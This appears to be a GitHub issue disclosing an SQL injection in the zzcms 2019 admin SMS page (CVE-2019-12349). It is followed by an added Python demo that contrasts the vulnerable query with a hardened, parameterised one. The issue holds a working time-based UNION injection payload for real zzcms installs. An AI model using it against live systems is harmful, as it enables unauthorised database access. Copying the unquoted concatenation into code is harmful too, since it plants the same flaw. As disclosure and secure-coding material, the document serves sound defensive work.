CVE-2019-12349: zzcms 2019 admin/dl_sendsms.php SQL injection · Issue #2 · cby234/zzcms
An issue was discovered in zzcms 2019. SQL Injection exists in /admin/dl_sendsms.php via the id parameter.
Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS 2018 upgraded to 2019 (ZZCMS2018升2019, released 2019-01-11)
0x01 Vulnerability (/admin/dl_sendsms.php lines 17 ~ 37)

Look at the part of the script that builds the SQL query. Around line 32 the script checks whether the id value contains a comma:

if(strpos($id,",")>0)

When the check passes, the query is built by string concatenation:

"select * from zzcms_dl where saver<>'' and id in (" . $id . ")"

The id parameter is concatenated into the query unquoted and without being cast to an integer, so arbitrary SQL can be injected through it. Because of the strpos condition, the injected value must contain a comma at an index greater than 0; appending a "," at the end of the id value is enough to reach this branch.
0x02 Payload

Send the following POST body to /admin/dl_sendsms.php (an authenticated admin session is required, as the script lives under /admin/). The id parameter is submitted as id[]; the injected value closes the "in (" parenthesis, appends a UNION SELECT whose 23 columns (22 literal 1 values plus sleep(3)) match the column count of zzcms_dl, comments out the rest of the query with "-- a", and ends with "," so the strpos check is satisfied. The sleep(3) makes the injection observable as a 3-second delay in the response (time-based confirmation). The submit23 value is the form button's URL-encoded Chinese label ("send an SMS reminder to the recipients").

POC (Union SQL injection, POST data):

submit23=%E7%BB%99%E6%8E%A5%E6%94%B6%E8%80%85%E5%8F%91%E6%89%8B%E6%9C%BA%E7%9F%AD%E4%BF%A1%E6%8F%90%E9%86%92&pagename=dl_manage.php%3Fb%3D0%26shenhe%3D%26page%3D1&tablename=zzcms_dl&id%5B%5D=1) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(3)-- a,
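The following is an added example, not code from zzcms or from the issue reporter. It models the query construction the issue describes (an unquoted id concatenated into "id in (...)" behind a strpos(",") check) against a constructed two-column stand-in for zzcms_dl in SQLite, and contrasts it with a hardened version that validates every id as an integer and binds the list with placeholders. SQLite has no sleep(), so the demo payload is a UNION that returns an attacker-chosen row rather than the time-based sleep(3) payload above; the table, rows and function names are all assumptions made for the example.

```python
import re
import sqlite3

# Constructed toy zzcms_dl table: only (id, saver). The real table has many more
# columns, which is why the issue's payload pads its UNION out to 23 columns.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table zzcms_dl (id integer primary key, saver text)")
    conn.executemany("insert into zzcms_dl values (?, ?)",
                     [(1, "alice"), (2, ""), (3, "bob")])
    conn.commit()
    return conn

def takes_in_branch(id_value: str) -> bool:
    """Mirror of the gate described in the issue, if(strpos($id,",")>0):
    true only when a comma appears at index 1 or later, so a trailing ','
    on the injected value is enough to reach the vulnerable query."""
    return id_value.find(",") > 0

def vulnerable_query(id_value: str) -> str:
    """Query built by plain string concatenation, as the issue describes:
    the id value is neither quoted nor cast, so SQL inside it is executed."""
    return ("select id, saver from zzcms_dl where saver<>'' and id in ("
            + id_value + ")")

def run_vulnerable(conn: sqlite3.Connection, id_value: str) -> list:
    if not takes_in_branch(id_value):
        raise ValueError("value without a comma never reaches the 'in (...)' query")
    return conn.execute(vulnerable_query(id_value)).fetchall()

def parse_ids(id_value: str) -> list:
    """Hardened parsing: every comma-separated item must be a pure decimal
    integer (a trailing comma is tolerated); anything else is rejected."""
    ids = []
    for part in id_value.split(","):
        part = part.strip()
        if part == "":
            continue
        if not re.fullmatch(r"[0-9]+", part):
            raise ValueError("rejected non-numeric id: %r" % part)
        ids.append(int(part))
    if not ids:
        raise ValueError("no ids supplied")
    return ids

def run_hardened(conn: sqlite3.Connection, id_value: str) -> list:
    """Same query, but the id list is validated and bound with one
    placeholder per id, so the value can never change the SQL text."""
    ids = parse_ids(id_value)
    placeholders = ",".join("?" * len(ids))
    sql = ("select id, saver from zzcms_dl where saver<>'' and id in ("
           + placeholders + ")")
    return conn.execute(sql, ids).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Same shape as the issue's payload: close the parenthesis, UNION,
    # comment out the tail, trailing comma to satisfy the strpos check.
    payload = "0) union select 99,'injected'-- a,"
    print(run_vulnerable(db, payload))   # attacker-controlled row comes back
    print(run_hardened(db, "1,3,"))      # only the requested rows
    try:
        run_hardened(db, payload)
    except ValueError as e:
        print("hardened version rejected payload:", e)
```

The hardened variant keeps the comma-separated id list the form already sends, so the fix does not change the front end; it only stops the id value from ever being interpreted as SQL.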